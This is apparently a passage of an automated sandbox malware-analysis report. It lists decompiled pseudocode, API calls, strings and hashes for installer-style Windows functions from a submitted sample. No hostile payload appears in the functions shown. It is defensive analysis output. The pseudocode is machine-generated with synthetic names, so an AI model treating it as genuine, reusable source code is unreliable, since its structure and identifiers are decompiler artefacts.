				_t46 =  *0x49a014; // 0x400000
				GetModuleFileNameA(_t46,  &_v261, 0x100);
				OemToCharA( &_v261,  &_v261);
				_t52 = E004074A0( &_v261, 0x5c);
				if(_t52 != 0) {
					_t20 = _t52 + 1; // 0x1
					E00407308( &_v261, _t20);
				}
				_t54 = E00407480( &_v261, 0x2e);
				if(_t54 != 0) {
					 *_t54 = 0;
				}
				CharLowerA( &(( &_v261)[1]));
				_t24 = _t65 + 0x6c; // 0x41edf8
				E0040355C(_t24, 0x100,  &_v261);
				if( *0x49a034 == 0) {
					E0042385C(_t65, _t78, _t79);
				}
				 *((char*)(_t65 + 0x39)) = 1;
				 *((char*)(_t65 + 0x3a)) = 1;
				if(_v5 != 0) {
					_pop( *[fs:0x0]);
				}
				return _t65;
			}

0x00423674
0x00423674
0x00423674
0x00423681
0x00423683
0x00423686
0x00423686
0x0042368b
0x0042368e
0x00423694
0x004236a5
0x004236b4
0x004236bc
0x004236c1
0x004236c4
0x004236cb
0x004236d2
0x004236d9
0x004236e0
0x004236e4
0x004236f4
0x004236f6
0x004236fe
0x0042370d
0x00423712
0x00423712
0x00423715
0x00423718
0x0042372b
0x00423731
0x00423744
0x00423751
0x00423758
0x0042375a
0x00423763
0x00423763
0x00423770
0x00423777
0x00423779
0x00423779
0x00423784
0x00423789
0x00423797
0x004237a3
0x004237a7
0x004237a7
0x004237ac
0x004237b0
0x004237b8
0x004237ba
0x004237c1
0x004237cb

APIs

LoadIconA.USER32(00400000,MAINICON), ref: 00423704
GetModuleFileNameA.KERNEL32(00400000,?,00000100,00400000,MAINICON,?,?,?,00418FCE,00000000,?,?,00000001,00000000), ref: 00423731
OemToCharA.USER32(?,?), ref: 00423744
CharLowerA.USER32(?,00400000,?,00000100,00400000,MAINICON,?,?,?,00418FCE,00000000,?,?,00000001,00000000), ref: 00423784

Strings

2, xrefs: 004236D2
MAINICON, xrefs: 004236F9

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: Char$FileIconLoadLowerModuleName
String ID: 2$MAINICON
API String ID: 3935243913-3181700818
Opcode ID: 88fbd26443f82d8cc7783084aca3caf08c13c16c31fc68fb49b81886230862cb
Instruction ID: 15c2da7a63879c6dda256f6669c188d4e6ef7711e9be9b2e9bc7f6829eb0e824
Opcode Fuzzy Hash: 88fbd26443f82d8cc7783084aca3caf08c13c16c31fc68fb49b81886230862cb
Instruction Fuzzy Hash: 4F31C5B0A042459BDB10EF69D8C57C63BE8AF14308F4441BAE844DB393D7BED988CB59

Uniqueness

Uniqueness Score: -1.00%

Function 00418F20 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 55
threadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00418F20(void* __edi, void* __eflags) {
				char _v8;
				long _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v56;
				char _v60;
				short _t14;
				char _t15;
				intOrPtr _t22;
				intOrPtr _t25;
				intOrPtr _t27;
				intOrPtr _t29;

				_v24 = GetCurrentProcessId();
				_v20 = 0;
				_t14 = GlobalAddAtomA(E004078A0( &_v56,  &_v24, "Delphi%.8X", 0)); // executed
				 *0x49a5c6 = _t14;
				_t15 =  *0x49a014; // 0x400000
				_v20 = _t15;
				_v16 = 0;
				_v12 = GetCurrentThreadId();
				_v8 = 0;
				 *0x49a5c8 = GlobalAddAtomA(E004078A0( &_v60,  &_v20, "ControlOfs%.8X%.8X", 1));
				 *0x49a600 = E00402B30(1);
				_t22 =  *0x49a600; // 0x2260638
				E0040B5A0(_t22, 4);
				_t25 = E004230B0(1); // executed
				 *0x49a62c = _t25;
				_t27 = E00423674(0, 1, __edi); // executed
				 *0x49a628 = _t27;
				E0041F100();
				_t29 =  *0x49a628; // 0x2262410
				E004248E8(_t29, 1);
				E00406A04(E00418EF0, 1);
				return E0040AF84(0x412a08, 0x4138a8, 0x4138dc);
			}

0x00418f2a
0x00418f2e
0x00418f46
0x00418f4b
0x00418f53
0x00418f58
0x00418f5c
0x00418f66
0x00418f6a
0x00418f87
0x00418f99
0x00418fa3
0x00418fa8
0x00418fb6
0x00418fbb
0x00418fc9
0x00418fce
0x00418fd3
0x00418fda
0x00418fdf
0x00418fe9
0x00419005

APIs

GetCurrentProcessId.KERNEL32(00000000), ref: 00418F25
GlobalAddAtomA.KERNEL32 ref: 00418F46
GetCurrentThreadId.KERNEL32 ref: 00418F61
GlobalAddAtomA.KERNEL32 ref: 00418F82

Part of subcall function 004230B0: 740BAC50.USER32(00000000,?,?,00000000,?,00418FBB,00000000,?,?,00000001,00000000), ref: 00423106
Part of subcall function 004230B0: EnumFontsA.GDI32(00000000,00000000,00423050,00410638,00000000,?,?,00000000,?,00418FBB,00000000,?,?,00000001,00000000), ref: 00423119
Part of subcall function 004230B0: 740BAD70.GDI32(00000000,0000005A,00000000,00000000,00423050,00410638,00000000,?,?,00000000,?,00418FBB,00000000,?,?,00000001), ref: 00423121
Part of subcall function 004230B0: 740BB380.USER32(00000000,00000000,00000000,0000005A,00000000,00000000,00423050,00410638,00000000,?,?,00000000,?,00418FBB,00000000), ref: 0042312C

Part of subcall function 00423674: LoadIconA.USER32(00400000,MAINICON), ref: 00423704
Part of subcall function 00423674: GetModuleFileNameA.KERNEL32(00400000,?,00000100,00400000,MAINICON,?,?,?,00418FCE,00000000,?,?,00000001,00000000), ref: 00423731
Part of subcall function 00423674: OemToCharA.USER32(?,?), ref: 00423744
Part of subcall function 00423674: CharLowerA.USER32(?,00400000,?,00000100,00400000,MAINICON,?,?,?,00418FCE,00000000,?,?,00000001,00000000), ref: 00423784

Part of subcall function 0041F100: GetVersion.KERNEL32(?,00418FD8,00000000,?,?,00000001,00000000), ref: 0041F10E
Part of subcall function 0041F100: SetErrorMode.KERNEL32(00008000,?,00418FD8,00000000,?,?,00000001,00000000), ref: 0041F12A
Part of subcall function 0041F100: LoadLibraryA.KERNEL32(CTL3D32.DLL,00008000,?,00418FD8,00000000,?,?,00000001,00000000), ref: 0041F136
Part of subcall function 0041F100: SetErrorMode.KERNEL32(00000000,CTL3D32.DLL,00008000,?,00418FD8,00000000,?,?,00000001,00000000), ref: 0041F144
Part of subcall function 0041F100: GetProcAddress.KERNEL32(00000001,Ctl3dRegister), ref: 0041F174
Part of subcall function 0041F100: GetProcAddress.KERNEL32(00000001,Ctl3dUnregister), ref: 0041F19D
Part of subcall function 0041F100: GetProcAddress.KERNEL32(00000001,Ctl3dSubclassCtl), ref: 0041F1B2
Part of subcall function 0041F100: GetProcAddress.KERNEL32(00000001,Ctl3dSubclassDlgEx), ref: 0041F1C7
Part of subcall function 0041F100: GetProcAddress.KERNEL32(00000001,Ctl3dDlgFramePaint), ref: 0041F1DC
Part of subcall function 0041F100: GetProcAddress.KERNEL32(00000001,Ctl3dCtlColorEx), ref: 0041F1F1
Part of subcall function 0041F100: GetProcAddress.KERNEL32(00000001,Ctl3dAutoSubclass), ref: 0041F206
Part of subcall function 0041F100: GetProcAddress.KERNEL32(00000001,Ctl3dUnAutoSubclass), ref: 0041F21B
Part of subcall function 0041F100: GetProcAddress.KERNEL32(00000001,Ctl3DColorChange), ref: 0041F230
Part of subcall function 0041F100: GetProcAddress.KERNEL32(00000001,BtnWndProc3d), ref: 0041F245

Strings

Delphi%.8X, xrefs: 00418F37
ControlOfs%.8X%.8X, xrefs: 00418F73

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: AddressProc$AtomCharCurrentErrorGlobalLoadMode$B380EnumFileFontsIconLibraryLowerModuleNameProcessThreadVersion
String ID: ControlOfs%.8X%.8X$Delphi%.8X
API String ID: 879771667-2767913252
Opcode ID: 826db4222df8d08eafbaf34ba611b876800f42895f0eabbafa8aa2df7a584a82
Instruction ID: f60795be8e24d2359d783261ed98843fb923e895910ebc189cdb843b9ded4107
Opcode Fuzzy Hash: 826db4222df8d08eafbaf34ba611b876800f42895f0eabbafa8aa2df7a584a82
Instruction Fuzzy Hash: 53113D706182409AC700FF66984678A7AE0EBA430CF44853FF848EB3A1DB3D9954CB5F

Uniqueness

Uniqueness Score: -1.00%

Function 004019CC Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 48
memoryCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E004019CC() {
				void* _t11;
				signed int _t13;
				intOrPtr _t19;
				void* _t20;
				intOrPtr _t23;

				_push(_t23);
				_push(E00401A82);
				_push( *[fs:edx]);
				 *[fs:edx] = _t23;
				_push(0x49a420);
				L00401320();
				if( *0x49a036 != 0) {
					_push(0x49a420);
					L00401328();
				}
				E00401390(0x49a440);
				E00401390(0x49a450);
				E00401390(0x49a47c);
				_t11 = LocalAlloc(0, 0xff8); // executed
				 *0x49a478 = _t11;
				if( *0x49a478 != 0) {
					_t13 = 3;
					do {
						_t20 =  *0x49a478; // 0x772b70
						 *((intOrPtr*)(_t20 + _t13 * 4 - 0xc)) = 0;
						_t13 = _t13 + 1;
					} while (_t13 != 0x401);
					 *((intOrPtr*)(0x49a464)) = 0x49a460;
					 *0x49a460 = 0x49a460;
					 *0x49a46c = 0x49a460;
					 *0x49a419 = 1;
				}
				_pop(_t19);
				 *[fs:eax] = _t19;
				_push(E00401A89);
				if( *0x49a036 != 0) {
					_push(0x49a420);
					L00401330();
					return 0;
				}
				return 0;
			}

0x004019d1
0x004019d2
0x004019d7
0x004019da
0x004019dd
0x004019e2
0x004019ee
0x004019f0
0x004019f5
0x004019f5
0x004019ff
0x00401a09
0x00401a13
0x00401a1f
0x00401a24
0x00401a30
0x00401a32
0x00401a37
0x00401a37
0x00401a3f
0x00401a43
0x00401a44
0x00401a50
0x00401a53
0x00401a55
0x00401a5a
0x00401a5a
0x00401a63
0x00401a66
0x00401a69
0x00401a75
0x00401a77
0x00401a7c
0x00000000
0x00401a7c
0x00401a81

APIs

RtlInitializeCriticalSection.KERNEL32(0049A420,00000000,00401A82,?,?,0040222E,022A8B6C,0000200C,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019E2
RtlEnterCriticalSection.KERNEL32(0049A420,0049A420,00000000,00401A82,?,?,0040222E,022A8B6C,0000200C,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019F5
LocalAlloc.KERNEL32(00000000,00000FF8,0049A420,00000000,00401A82,?,?,0040222E,022A8B6C,0000200C,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A1F
RtlLeaveCriticalSection.KERNEL32(0049A420,00401A89,00000000,00401A82,?,?,0040222E,022A8B6C,0000200C,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A7C

Strings

Lw, xrefs: 00401A0E
p+w, xrefs: 00401A24, 00401A29, 00401A37

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: CriticalSection$AllocEnterInitializeLeaveLocal
String ID: Lw$p+w
API String ID: 730355536-2978669739
Opcode ID: 5e2eb2496afd3fc4c16b730b74e1b05e66d96082c0f1b154e12a188d47f45e1b
Instruction ID: b5067cfae5201e79e85213ffc863b03902d2ba9507e13bed97c350dada6f2a02
Opcode Fuzzy Hash: 5e2eb2496afd3fc4c16b730b74e1b05e66d96082c0f1b154e12a188d47f45e1b
Instruction Fuzzy Hash: 9C01C0706442405EFB19AB69980A7263ED4D79574CF11803BF840A6AF1CAFC48A0CBAF

Uniqueness

Uniqueness Score: -1.00%

Function 00413624 Relevance: 9.1, APIs: 6, Instructions: 60
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00413624(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				void* _t20;
				void* _t21;
				void* _t27;
				void* _t31;
				void* _t35;
				intOrPtr* _t43;

				_t43 =  &_v8;
				_t20 =  *0x4982d8; // 0x0
				 *((intOrPtr*)(_t20 + 0xc0)) = _a4;
				_t21 =  *0x4982d8; // 0x0
				SetWindowLongA(_a4, 0xfffffffc,  *(_t21 + 0xa8));
				if((GetWindowLongA(_a4, 0xfffffff0) & 0x40000000) != 0 && GetWindowLongA(_a4, 0xfffffff4) == 0) {
					SetWindowLongA(_a4, 0xfffffff4, _a4);
				}
				_t27 =  *0x4982d8; // 0x0
				SetPropA(_a4,  *0x49a5c8 & 0x0000ffff, _t27);
				_t31 =  *0x4982d8; // 0x0
				SetPropA(_a4,  *0x49a5c6 & 0x0000ffff, _t31);
				_t35 =  *0x4982d8; // 0x0
				 *0x4982d8 = 0; // executed
				_v8 =  *((intOrPtr*)(_t35 + 0xa8))(_a4, _a8, _a12, _a16);
				return  *_t43;
			}

0x00413629
0x0041362c
0x00413634
0x0041363a
0x0041364c
0x00413661
0x0041367c
0x0041367c
0x00413681
0x00413693
0x00413698
0x004136aa
0x004136bb
0x004136c1
0x004136d1
0x004136d9

APIs

SetWindowLongA.USER32 ref: 0041364C
GetWindowLongA.USER32 ref: 00413657
GetWindowLongA.USER32 ref: 00413669
SetWindowLongA.USER32 ref: 0041367C
SetPropA.USER32(?,00000000,00000000), ref: 00413693
SetPropA.USER32(?,00000000,00000000), ref: 004136AA

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: LongWindow$Prop
String ID:
API String ID: 3887896539-0
Opcode ID: e076ad714177ce8322845bf76c5a6a112f9cb2616a25e616592a5f0040cf25c6
Instruction ID: 0779cf8e73b7d0765732b6a5dc8b8604ed1f48a9427957ca6adda61974668b82
Opcode Fuzzy Hash: e076ad714177ce8322845bf76c5a6a112f9cb2616a25e616592a5f0040cf25c6
Instruction Fuzzy Hash: C011CC75500244BFDF00DF9DDC84E9A3BE8AB19364F11466AF918DB2A1D738D9908B94

Uniqueness

Uniqueness Score: -1.00%

Function 004548F4 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 142
registryCOMMON

Download Yara Rule

C-Code - Quality: 57%

			E004548F4(intOrPtr __eax, void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _v8;
				void* _v12;
				char _v16;
				char _v20;
				intOrPtr* _v24;
				char _v112;
				char _v4208;
				char _v4212;
				char _v4216;
				void* _t41;
				void* _t70;
				void* _t80;
				void* _t86;
				void* _t105;
				void* _t106;
				intOrPtr _t111;
				intOrPtr _t113;
				intOrPtr _t119;
				void* _t129;
				void* _t130;
				intOrPtr _t132;

				_t129 = _t130;
				_push(__eax);
				_t132 = _t130 + 0xffffffffffffef90;
				_v4212 = 0;
				_v4216 = 0;
				_v16 = 0;
				_v20 = 0;
				_v8 = __eax;
				_push(_t129);
				_push(0x454acb);
				_push( *[fs:eax]);
				 *[fs:eax] = _t132;
				_t41 = E00450B94( &_v112);
				_push(_t129);
				_push(0x454a8b);
				_push( *[fs:edx]);
				 *[fs:edx] = _t132;
				if(E0042DAF4(_t41) == 0) {
					E0042D83C( &_v4216);
					E0042C3E4(_v4216,  &_v4212);
					E004035C0( &_v20, "WININIT.INI", _v4212);
					if(E0042CCC8(_v20) == 0) {
						goto L12;
					} else {
						_v24 = E0044FA8C(1, 1, 0, 2);
						_push(_t129);
						_push(0x454a7a);
						_push( *[fs:edx]);
						 *[fs:edx] = _t132;
						while( *((intOrPtr*)( *_v24 + 8))() != 0) {
							E00450BBC( &_v112, _t62,  &_v4208);
						}
						_pop(_t119);
						 *[fs:eax] = _t119;
						_push(0x454a81);
						return E00402B58(_v24);
					}
				} else {
					_t70 = E0042DD1C(0, "SYSTEM\\CurrentControlSet\\Control\\Session Manager", 0x80000002,  &_v12, 1, 0); // executed
					if(_t70 == 0) {
						if(E0042DC58() != 0) {
							_push(E00403574(_v16));
							_t86 = E00403744( &_v16);
							_pop(_t106);
							E00450BBC( &_v112, _t106, _t86);
						}
						if(E0042DC58() != 0) {
							_push(E00403574(_v16));
							_t80 = E00403744( &_v16);
							_pop(_t105);
							E00450BBC( &_v112, _t105, _t80);
						}
						RegCloseKey(_v12);
					}
					L12:
					_pop(_t111);
					 *[fs:eax] = _t111;
					E00450C6C( &_v112, _v8);
					_pop(_t113);
					 *[fs:eax] = _t113;
					_push(0x454ad2);
					E00403420( &_v4216, 2);
					return E00403420( &_v20, 2);
				}
			}

0x004548f5
0x004548fd
0x004548fe
0x00454906
0x0045490c
0x00454912
0x00454915
0x00454918
0x0045491d
0x0045491e
0x00454923
0x00454926
0x0045492c
0x00454933
0x00454934
0x00454939
0x0045493c
0x00454946
0x004549e1
0x004549f2
0x00454a05
0x00454a14
0x00000000
0x00454a16
0x00454a2b
0x00454a30
0x00454a31
0x00454a36
0x00454a39
0x00454a3c
0x00454a5d
0x00454a5d
0x00454a66
0x00454a69
0x00454a6c
0x00454a79
0x00454a79
0x0045494c
0x00454960
0x00454967
0x0045497f
0x00454989
0x0045498d
0x00454997
0x00454998
0x00454998
0x004549af
0x004549b9
0x004549bd
0x004549c7
0x004549c8
0x004549c8
0x004549d1
0x004549d1
0x00454a81
0x00454a83
0x00454a86
0x00454a9b
0x00454aa2
0x00454aa5
0x00454aa8
0x00454ab8
0x00454aca
0x00454aca

APIs

Part of subcall function 0042DD1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,00481B1F,?,00000001,?,?,00481B1F,?,00000001,00000000), ref: 0042DD38

RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,00454A8B,?,00000000,00454ACB), ref: 004549D1

Strings

SYSTEM\CurrentControlSet\Control\Session Manager, xrefs: 00454954
PendingFileRenameOperations2, xrefs: 004549A0
PendingFileRenameOperations, xrefs: 00454970
WININIT.INI, xrefs: 00454A00

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: CloseOpen
String ID: PendingFileRenameOperations$PendingFileRenameOperations2$SYSTEM\CurrentControlSet\Control\Session Manager$WININIT.INI
API String ID: 47109696-2199428270
Opcode ID: d314e34af34ca3f1ffc8ed6abeb212b3f260a563e5a3b4e44fe77c79e7713e00
Instruction ID: c8614a43b3fdf1ca99845ba706fb83f427c4a6f3b6def5a4700fbed36f33a6e0
Opcode Fuzzy Hash: d314e34af34ca3f1ffc8ed6abeb212b3f260a563e5a3b4e44fe77c79e7713e00
Instruction Fuzzy Hash: 0D518E70E042089FDB10DF61DC51ADEB7B9EF84309F50857BE804AB692D778AE45CA5C

Uniqueness

Uniqueness Score: -1.00%

Function 00452D84 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 83
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E00452D84(void* __eax, long __ebx, void* __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				int _t30;
				intOrPtr _t62;
				void* _t72;
				intOrPtr _t75;

				_t70 = __edi;
				_t53 = __ebx;
				_t54 = 0;
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(__ebx);
				_push(__edi);
				_t72 = __eax;
				_push(_t75);
				_push(0x452e73);
				_push( *[fs:eax]);
				 *[fs:eax] = _t75;
				while(1) {
					E0042D918( &_v12, _t53, _t54, _t70, _t72); // executed
					_t54 = 0x452e8c;
					E00452B10(0, _t53, 0x452e8c, _v12, _t70, _t72,  &_v8); // executed
					_t30 = CreateDirectoryA(E00403738(_v8), 0); // executed
					if(_t30 != 0) {
						break;
					}
					_t53 = GetLastError();
					if(_t38 != 0xb7) {
						E004507B8(0x2f,  &_v28, _v8);
						_v24 = _v28;
						E00406D48(_t53,  &_v32);
						_v20 = _v32;
						_t13 =  &_v36; // 0x496e25
						E0042E714(_t53, _t13);
						_t14 =  &_v36; // 0x496e25
						_v16 =  *_t14;
						_t16 =  &_v24; // 0x496e5c
						E00450788(0x60, 2, _t16,  &_v12);
						_t54 = _v12;
						E00408BEC(_v12, 1);
						E0040311C();
					}
				}
				E00403494(_t72, _v8);
				_pop(_t62);
				 *[fs:eax] = _t62;
				_push(E00452E7A);
				_t19 =  &_v36; // 0x496e25
				E00403420(_t19, 3);
				return E00403420( &_v12, 2);
			}

0x00452d84
0x00452d84
0x00452d87
0x00452d89
0x00452d8a
0x00452d8b
0x00452d8c
0x00452d8d
0x00452d8e
0x00452d8f
0x00452d90
0x00452d91
0x00452d93
0x00452d94
0x00452d98
0x00452d99
0x00452d9e
0x00452da1
0x00452da4
0x00452dab
0x00452db3
0x00452dba
0x00452dca
0x00452dd1
0x00000000
0x00000000
0x00452dd8
0x00452de0
0x00452dee
0x00452df6
0x00452dfe
0x00452e06
0x00452e09
0x00452e0e
0x00452e13
0x00452e16
0x00452e19
0x00452e23
0x00452e28
0x00452e32
0x00452e37
0x00452e37
0x00452de0
0x00452e46
0x00452e4d
0x00452e50
0x00452e53
0x00452e58
0x00452e60
0x00452e72

APIs

CreateDirectoryA.KERNEL32(00000000,00000000,?,00000000,00452E73,?,?,00000000,0049A628,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00452DCA
GetLastError.KERNEL32(00000000,00000000,?,00000000,00452E73,?,?,00000000,0049A628,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00452DD3

Strings

\nI, xrefs: 00452E19
.tmp, xrefs: 00452DB3
%nI, xrefs: 00452E58, 00452E09, 00452E13

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: CreateDirectoryErrorLast
String ID: %nI$.tmp$\nI
API String ID: 1375471231-1136394443
Opcode ID: 97bbbf2da9bd34b09db601ecf0f280ac09a7da54906fcadebe0e3a8adddd166c
Instruction ID: 03b0018369c728da033398bc18c7d62568b8f2dcd92537a7a12183c171906ceb
Opcode Fuzzy Hash: 97bbbf2da9bd34b09db601ecf0f280ac09a7da54906fcadebe0e3a8adddd166c
Instruction Fuzzy Hash: 38213575A00208ABDB05EFA1C9529DEB7BDEF49305F50447BEC01B7342DB7CAE058AA5

Uniqueness

Uniqueness Score: -1.00%

Function 00423A6C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00423A6C(void* __eax, void* __ecx) {
				struct HWND__* _v16;
				int _t17;
				void* _t28;
				void* _t33;
				long _t34;

				_t28 = __eax;
				_t17 =  *0x49a628; // 0x2262410
				if( *((intOrPtr*)(_t17 + 0x20)) != 0) {
					if( *((intOrPtr*)(__eax + 0x74)) == 0) {
						 *_t34 =  *((intOrPtr*)(__eax + 0x20));
						EnumWindows(E00423A04, _t34); // executed
						_t17 =  *(_t28 + 0x70);
						if( *((intOrPtr*)(_t17 + 8)) != 0) {
							_v16 = GetWindow(_v16, 3);
							if((GetWindowLongA(_v16, 0xffffffec) & 0x00000008) != 0) {
								_v16 = 0xfffffffe;
							}
							_t17 =  *(_t28 + 0x70);
							_t33 =  *((intOrPtr*)(_t17 + 8)) - 1;
							if(_t33 >= 0) {
								do {
									_t12 =  &_v16; // 0x424144
									_t17 = SetWindowPos(E0040B424( *(_t28 + 0x70), _t33),  *_t12, 0, 0, 0, 0, 0x13);
									_t33 = _t33 - 1;
								} while (_t33 != 0xffffffff);
							}
						}
					}
					 *((intOrPtr*)(_t28 + 0x74)) =  *((intOrPtr*)(_t28 + 0x74)) + 1;
				}
				return _t17;
			}

0x00423a6f
0x00423a71
0x00423a7a
0x00423a80
0x00423a85
0x00423a90
0x00423a95
0x00423a9c
0x00423aaa
0x00423abb
0x00423abd
0x00423abd
0x00423ac4
0x00423aca
0x00423ace
0x00423ad0
0x00423ada
0x00423aea
0x00423aef
0x00423af0
0x00423ad0
0x00423ace
0x00423a9c
0x00423af5
0x00423af5
0x00423afb

APIs

EnumWindows.USER32(00423A04), ref: 00423A90
GetWindow.USER32(?,00000003), ref: 00423AA5
GetWindowLongA.USER32 ref: 00423AB4
SetWindowPos.USER32(00000000,DAB,00000000,00000000,00000000,00000000,00000013,?,000000EC,?,?,?,00424193,?,?,00423D5B), ref: 00423AEA

Strings

DAB, xrefs: 00423ADA, 00423ADE

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: Window$EnumLongWindows
String ID: DAB
API String ID: 4191631535-4183991030
Opcode ID: b89371ce55fee71a81f56c0fb58a51ef6d14575590898134acdf293b48a15296
Instruction ID: 902e4707086c559fd181394619265fa26bf84509a1fee1099fec8f6fc81e9ab6
Opcode Fuzzy Hash: b89371ce55fee71a81f56c0fb58a51ef6d14575590898134acdf293b48a15296
Instruction Fuzzy Hash: BF115E70700610ABDB10DF28D885F5677E4EB08725F10067AF9949B2E2C3B89D40CB58

Uniqueness

Uniqueness Score: -1.00%

Function 0042DD44 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 32
registrylibraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E0042DD44(void* __eax, char* __ecx, void* __edx) {
				long _t6;

				_t10 = __ecx;
				_t7 = __edx;
				if(__eax == 2) {
					if( *0x49a65c == 0) {
						 *0x49a65c = GetProcAddress(GetModuleHandleA("advapi32.dll"), "RegDeleteKeyExA");
					}
					if( *0x49a65c == 0) {
						return 0x7f;
					} else {
						return  *0x49a65c(_t7, _t10, 0x100, 0);
					}
				}
				_t6 = RegDeleteKeyA(__edx, __ecx); // executed
				return _t6;
			}

0x0042dd46
0x0042dd48
0x0042dd4c
0x0042dd5f
0x0042dd76
0x0042dd76
0x0042dd82
